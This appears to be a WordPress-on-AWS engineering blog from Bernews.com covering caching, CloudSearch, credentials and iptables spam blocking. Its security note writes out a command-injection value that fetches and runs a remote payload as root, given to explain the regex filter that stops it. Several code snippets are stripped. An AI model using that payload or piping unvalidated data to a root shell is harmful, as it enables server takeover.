The technology behind Bermuda’s #1 news site

The Bernews Setup

Bernews.com is Bermuda’s #1 online news site, with 24-hour coverage. We use WordPress as the site’s CMS because it is convenient, flexible, free, extensible and has a lot of 3rd-party support. On the other hand WordPress is not known for being efficient or scalable so we have had to modify and tune the code to meet our needs (more about that in other posts). The goals we have when running the site are:

  1. 100% availability.
  2. Reasonable latency.
  3. Ability to handle a sudden surge in traffic when there is a breaking news story.
  4. Low labour costs — we can’t afford to have someone maintaining the site full-time.

I’ll give a brief look at how the site is implemented with those goals in mind.

Our Amazon Web Services Architecture

Bernews.com runs on Amazon Web Services (AWS). We actually use a lot of different services to run the site:

  • CloudFront (the Amazon CDN)
  • CloudWatch (monitoring)
  • CloudSearch (full-text searching)
  • Route 53 (DNS)
  • EC2/EBS (servers)
  • RDS (managed MySQL)
  • IAM (security/access management)
  • ElastiCache

The main services are stitched together like this:


Lessons Learned

Prefer Services to Servers

Whenever possible we rely on a reliable managed service instead of running our own server:

  • Instead of storing static assets on disk we put them in S3.
  • Instead of running Varnish, Nginx or Squid as a reverse proxy we use the CloudFront CDN.
  • We don’t run our own MySQL database, we use a multi-AZ RDS instance.
  • Rather than install memcached we use an ElastiCache node for some caching.

In general, services have more redundancy than running our own server and in most cases recovery from service failure is handled automatically.

Of course we do also have the ability to restore from backups if there is a complete service failure, but in general these AWS services have been highly reliable.

Minimize HTTP requests to the server

All images, javascript and CSS are served through the CloudFront CDN. This means that retrieving a web page makes just 1 HTTP request to bernews.com, with the rest of the requests going to cloudfront.bernews.com and s3.bernews.com. This makes it easy for the web server to handle a load surge because it just has to serve 20KB of compressed HTML, with the rest of the data cached in CloudFront.

Backups are cheap and fast

One very appealing feature of RDS is that it continuously backs up the MySQL database (with the backup typically running about 5 minutes behind). Keeping the full 35 days of backups doesn’t actually cost us anything because we are still within the free allowance.

EBS snapshots are very cheap as well. Amazon only charges for the amount of data that changed between snapshots, which is typically only a few MB. All of our EBS volumes are backed up every 10 minutes with a retention of 24 hourly backups, 7 daily backups and 5 weekly backups. That costs a few dollars a month.

EC2+EBS+Elastic IPs = Flexibility

EC2 allows us to upgrade, move or resize a server with no downtime. The basic approach is to:

  • Take a snapshot of the EBS volume.
  • Create an AMI from the EBS volume.
  • Launch a new EC2 instance from the AMI.
  • Move the Elastic IP to the new instance.
This approach lets us seamlessly upgrade the OS, resize an EBS volume or move a machine between availability zones. It also lets us create a new instance from a backup if something goes horribly wrong (like a complete AZ failure).

Monitor Everything

At Bernews we use three different services to monitor the health of our servers:

  • Amazon CloudWatch (CPU, disk latency, free disk space, free memory)
  • Pingdom (website availability and response times)
  • CopperEgg (provides a great dashboard for realtime server monitoring)

All alarms are set to contact us via e-mail and SMS so we don’t want noisy alarms. On the other hand we would like our alarms to be reasonably sensitive. To do that we went through an initial learning period where we were tuning our alarms:

  1. We have CloudWatch alarms on INSUFFICIENT_DATA (this happens when a resource is offline). CloudWatch can have delays in data collection we found that the alarm period has to be several collection intervals to avoid false positives.
  2. As we monitor our servers we can build a model of the expected range of values for our servers. This lets us make some alarms more sensitive. For example, by tracking the CPU usage of our database server we have lowered the CPU alarm to “CPUUtilization > 25 for 5 minutes” because we now know that situation would be extremely anomalous.

CloudLink: Our Internal WordPress Related Posts Plugin

Every story on Bernews has a “Related Posts” section, which lists other stories which are similar to the current one. There are a lot of WordPress plugins that generate related posts, but a lot of them are very slow and resource intensive when dealing with large numbers of posts.

The challenge is that finding related posts isn’t a very database-friendly query. To find related items a story has to be compared against all other stories in the database to find the best match. Trying to do that with conventional SQL queries quickly becomes very slow.

Finding related posts is best viewed as a full-text search problem — I want to find a post which contains as many of the keywords in the current post as possible. The keywords can be the categories/tags of the post or even the body of the post (an approach that the YARPP plugin takes).

It is possible to do full-text queries in MySQL, but that currently requires the MyISAM engine (at least until MySQL 5.6 is released). The Bernews database server uses the InnoDB storage engine because of its concurrency, reliability and ease of administration (especially when using Amazon’s RDS service).

As Bernews is hosted in AWS I decided to use the CloudSearch full-text indexing service to find related posts. This meant writing a custom WordPress plugin to:

  • Perform an initial crawl of the site, indexing all posts.
  • Add new posts to CloudSearch as they are created.
  • Query CloudSearch to find related posts when an article page is rendered.

For ‘relatedness’ I decided to use the post’s taxonomies (categories and tags). They are added to CloudSearch as a list of words, along with the ID of the post and its date.

To query for relatedness we take a list of the current post’s taxonomies and create a CloudSearch query like this:

$query = "?bq=taxonomies:'" . implode('|', $terms) . sprintf("'&size=%d", $num_posts + 1) . '&return-fields=postid&rank=-relevance_date';

(Note that we have to get N+1 posts to get N related posts. This is because the query will return a post as being related to itself. That post is stripped out of the results if needed.)

Note that we have a custom rank for our results. We want to sort by the relevance of the text and break ties on the post date. To do that we define a custom rank as something like:


The plugin is coded so that if there are any problems with CloudSearch (i.e., the service is down) the “Related Posts” part of the article isn’t added at all.

CloudLink finds related posts extremely quickly. I changed the hook to add an HTML comment to the related posts showing the total time taken. Finding related posts takes 5-20 milliseconds, some examples:

<!-- Cloudlink found 427 related posts in 5 milliseconds -->
<!-- Cloudlink found 3318 related posts in 10 milliseconds -->
<!-- Cloudlink found 1403 related posts in 20 milliseconds -->

To avoid making a lot of CloudSearch requests I added the final HTML for the related posts to the object cache. This is useful in the case where a page can’t be cached because a user has cookies (e.g. because they added a comment to the page). This lets us avoid querying the CloudSearch server again.

This plugin requires CloudSearch (which costs some money) and some manual setup (to create the CloudSearch domain) so it isn’t suitable for public release. On the other hand, if you have a large WordPress installation and what to try this out then feel free to contact us.

Blocking Comment Spammers

Bernews attracts a lot of comment spam. Almost all of it is blocked by Akismet but the spammers still use up server resources (network, CPU, disk). To reduce the impact of the worst spammers we have started using iptables to block them. That is very straightforward to do because we can just query the WordPress database to get that information.

Once an hour the root user runs a script which blocks the IP addresses that have generated at least 10 comments which were marked as spam. To avoid generating unlimited rules we limit the list to the 256 addresses with the most spam. The script looks like this:

/sbin/iptables --flush
/usr/bin/mysql --batch --skip-column-names --host=HOST --user=USER --password=PASSWORD "--execute=SELECT t.iptables FROM (SELECT CONCAT(/sbin/iptables -I INPUT -s ', c.comment_author_ip, ' -j DROP -m comment --comment \'', COUNT(*), ' spam comments\'') as iptables, COUNT(*) as instances, c.comment_author_ip FROM wp_comments AS c WHERE c.comment_approved ='spam' AND c.comment_author_ip REGEXP '[0-9]+.[0-9]+.[0-9]+.[0-9]' GROUP BY c.comment_author_IP HAVING instances >= 10 ORDER BY instances DESC LIMIT 256) AS t WHERE t.comment_author_ip REGEXP '[0-9]{1,3}[.][0-9]{1,3}[.][0-9]{1,3}[.][0-9]{1,3}'" wordpress | /bin/bash

The script results in rules like this:

Chain INPUT (policy ACCEPT)
target     prot opt source               destination
DROP       all  --       anywhere             /* 10 spam comments */
DROP       all  --  anon-184-65.vpn.ipredator.se  anywhere             /* 10 spam comments */
DROP       all  --  h176-227-197-109.host.redstation.co.uk  anywhere             /* 10 spam comments */
DROP       all  --          anywhere             /* 91 spam comments */
DROP       all  --  46-105-52-167.kimsufi.com  anywhere             /* 104 spam comments */
DROP       all  --        anywhere             /* 130 spam comments */
DROP       all  --       anywhere             /* 152 spam comments */
DROP       all  --       anywhere             /* 168 spam comments */
DROP       all  --  sd-35481.dedibox.fr  anywhere             /* 172 spam comments */
DROP       all  --        anywhere             /* 205 spam comments */
DROP       all  --         anywhere             /* 279 spam comments */
DROP       all  --       anywhere             /* 359 spam comments */

Spam comments older than 15 days are deleted so blocked IP addresses will be unblocked after 2 weeks. This will either:
a) Unblock people who got a previously blocked IP address.
b) Allow the spammers to post another 10 spam comments.

Security note: We are pulling information from the database and using it to construct commands that will be run as root. We want to avoid privilege escalation bugs where an attacker creates data where the comment_author_ip column is something like “; curl BAD_URL > /tmp/x; /bin/sh /tmp/x; echo” resulting in the execution of

sudo /sbin/iptables -I INPUT -s; curl BAD_URL > /tmp/x; /bin/sh /tmp/x; echo -j DROP -m comment --comment '10 spam comments'

To avoid that we add “AND c.comment_author_ip REGEXP ‘[0-9]+.[0-9]+.[0-9]+.[0-9]'” to a WHERE clause so that only valid IP addresses are extracted. We filter after grouping to reduce the amount of regular expression processing.

Opera Prefetch

This morning load on the Bernews server was unusually high so I took a look at the web logs for that time period. A lot of the load was being caused by requests like these: - - [27/Jan/2013:17:25:00 +0000] "GET /2012/01/plp-oba-on-guest-worker-policies/?replytocom=149409 HTTP/1.1" 200 71657 "" "Opera/9.80 (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60" 1685448 - - [27/Jan/2013:17:25:01 +0000] "GET /2012/01/plp-oba-on-guest-worker-policies/?replytocom=149405 HTTP/1.1" 200 71658 "" "Opera/9.80 (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60" 2070743 - - [27/Jan/2013:17:25:01 +0000] "GET /2012/01/plp-oba-on-guest-worker-policies/?replytocom=149873 HTTP/1.1" 200 71656 "" "Opera/9.80 (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60" 2165319 - - [27/Jan/2013:17:25:01 +0000] "GET /2012/01/plp-oba-on-guest-worker-policies/?replytocom=149868 HTTP/1.1" 200 71656 "" "Opera/9.80 (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60" 2486523 - - [27/Jan/2013:17:25:01 +0000] "GET /2012/01/plp-oba-on-guest-worker-policies/?replytocom=149743 HTTP/1.1" 200 71656 "" "Opera/9.80 (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60" 2715922 - - [27/Jan/2013:17:25:01 +0000] "GET /2012/01/plp-oba-on-guest-worker-policies/?replytocom=149629 HTTP/1.1" 200 71656 "" "Opera/9.80 (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60" 2616717

(I’ve changed the IP address, but the real address appears to be in China which is unusual for Bernews…)

The WordPress post/?replytocom pattern has caused a bunch of issues already. The problem is that pages with query strings bypass the W3TC cache and are generated on-the-fly. This isn’t a problem until some sort of crawler starts enumerating and fetching all the links on a page. For example, Bing was prone doing that util I disabled those urls in the Bing webmaster tools. These requests appear to be generated either by super-agressive link pre-fetching in Opera or some sort of home-brew web crawler that is using the Opera browser string.

In this case the load didn’t last for very long and that visitor hasn’t returned. If this causes problems in the future we will block/throttle/cache appropriately.

Using Temporary Credentials With the EC2 CLI

Using the EC2 command line tools is convenient for ad-hoc AWS tasks or manually-run scripts. This requires passing the access key ID and secret access key to the tools, either through environment variables (AWS_ACCESS_KEY, AWS_SECRET_KEY) or commandline options (–aws-access-key, –aws-secret-key). To avoid leaking our AWS credentials we want to follow several security best practices when using the EC2 CLI:

  • Least privilege: the credentials we use should only have privileges for the operations we want to perform.
  • MFA: using the credentials should require multi-factor access.
  • Rotation: the credentials should be rotated frequently.
  • Conditions: place time/location restrictions on how credentials can be used.

To solve this we can create an IAM user and generate temporary credentials for that user using an MFAtoken. Here is a quick example:

First create an IAM group with the desired policy:

      "Effect": "Allow",
      "Action": "*",
      "Resource": "*",

This policy allows access to all features, but only with MFA access. A more sophisticated policy would allow access to only some features and restrict access by time or IP address (for example, you can restrict the credentials to only work on specific EC2 machines, identified by IP address).

Next, create a new IAM user, add the user to the group, and associate an MFA token with the user.

The Amazon Security Token Service can generate temporary credentials for an IAM user. The EC2 CLI tools can use the temporary credentials (through the AWS_DELEGATION_TOKEN environment variable or –security-token command line parameter) so we just need to generate temporary credentials and pass them to the EC2 CLI.  To generate a temporary token we will need three pieces of information:

  • The access key ID.
  • The secret access key.
  • The ARN of the MFA token.
  • The current value of the MFA token.

There isn’t a commandline program to generate the tokens, but a short Python program can generate the required information:

import boto
import sys

if (len(sys.argv) <> 5):
    print 'Usage ' + sys.argv[0] + ' access_key secret_key mfa_serial_number mfa_token'

access_key = sys.argv[1]
secret_key = sys.argv[2]
mfa_serial_number = sys.argv[3]
mfa_token = sys.argv[4]

sts = boto.connect_sts(access_key, secret_key)

token = sts.get_session_token(duration = 3600, force_new = True, mfa_serial_number = mfa_serial_number, mfa_token = mfa_token)
print 'export AWS_ACCESS_KEY=' + token.access_key
print 'export AWS_SECRET_KEY=' + token.secret_key
print 'export AWS_DELEGATION_TOKEN=' + token.session_token

Assuming the program is called ‘sts-get-token’, it is run like this:

./sts-get-token BJ2FP3J0ZD2F1UTX2NM lxeHJ2qefgNV43xesFEE12aZfr321b0xBAAFiG8F arn:aws:iam::123456789:mfa/login 654321

This prints out three environment variables. After setting the environment variables the EC2 commandline tools will work for the next hour. After that they will fail with “Client.RequestExpired: Request has expired.”

How effective is the CloudFront CDN?

Bernews uses CloudFront as an origin-pull CDN. The W3 Total Cache (W3TC) plugin automatically replaces references to image, javascript and CSS with URLs that point at our CloudFront distribution. So, instead of pointing at the bernews.com server directly a story will reference cloudfront.bernews.com like this:


CloudFront will then request the image from its ‘real’ URL (in this case http://bernews.com/wp-content/uploads/2012/11/all-designs-on-stage.jpg). The image is cached by CloudFront and used to serve other requests without retrieving the image from the bernews.com server.

This caching should greatly reduce the load on the server, but how effective is it?

To investigate I picked a random story that had a lot of images in it:


Our stats show that this story had 5,221 views (which doesn’t include the 73 times Google crawled it or the stunning 1,046 times that Bing crawled the page).

This story has several images in it. I broke down the stats for the first image in the story:


The Apache logs show that CloudFront has only retrieved the Belmont-Golf-Course-Fire-Bermuda-November-29-2012-5-620×413.jpg image 50 times. That is a 100X reduction in network load on our web server!

In general, news stories are very CDN friendly — stories break, are read a lot and then are rarely retrieved. Having the images from our top stories cached in CloudFront means we can easily handle a large surge in traffic on a popular story. When I look at more popular stories the number of CloudFront requests remains basically constant even when the number of views doubles or triples.

W3TC Caching and Multiple WordPress installations

Bernews uses multiple wordpress installations on the same server. For example, bernews.com/flights, bernews.com/weather and bernews.com are all separate installations.

Adding W3 Total Cache to the installations caused confusion because the W3TC cache keys are unique per host, but not per installation. That means that sometime installation A will get an entry cached by installation B! This has completely unpredictable results.

To solve the problem I prepended an MD5 hash of the path to the blog to the cache key that W3TC generates. To do this for the object cache I modified W3_ObjectCache::_get_cache_key() in w3-total-cache/lib/W3/ObjectCache.php by adding this line to the key calculation code, after the sprintf() call:

$key = md5(__FILE__) . '_' . $key;

For the database query cache I made the same modification to W3_Db::_get_cache_key() in w3-total-cache/lib/W3/Db.php.

Bernews uses the “disk (enhanced)” option for page caching, which works fine with multiple installations. If we were using disk, APC or memcached then I think it would be necessary to make a similar change to W3_PgCache::_get_page_key() in w3-total-cache/lib/W3/PgCache.php.

W3TC page cache and spam comments

A few weeks ago I was examining Bernews performance and saw that the W3 Total Cache (W3TC) page cache was being invalidated far more often than I expected. This was happening even when no stories were being posted or comments approved.

It turns out that the page cache was being invalidated when a new comment was being submitted. Unfortunately Bernews receives a spam comment every few minutes. The excellent Akismet plugin catches all of them but the cached version of the homepage was being constantly invalidated.

I fixed the problem by modifying  W3TC to only purge the page cache when a comment is approved. To do that I had to change the W3_Plugin_PgCache::run() function in wp-content/plugins/w3-total-cache/lib/W3/Plugin/PgCache.php.

I removed these lines:

add_action('comment_post', array(
    ), 0);
add_action('edit_comment', array(
    ), 0);
add_action('delete_comment', array(
    ), 0);
add_action('wp_set_comment_status', array(
    ), 0, 2);
add_action('trackback_post', array(
    ), 0);
add_action('pingback_post', array(
    ), 0);

And added these instead:

add_action('comment_unapproved_to_approved', array(
    ), 0);
add_action('comment_spam_to_approved', array(
    ), 0);
add_action('comment_deleted_to_approved', array(
    ), 0);
add_action('comment_approved_to_deleted', array(
    ), 0);
add_action('comment_approved_to_unapproved', array(
    ), 0);
add_action('comment_approved_to_spam', array(
    ), 0);

Note that I did not change the db cache or object cache code! Those caches should be invalidated when a new comment is submitted.

This change greatly decreased the number of times the page cache was invalidated, improving the average response time of the site.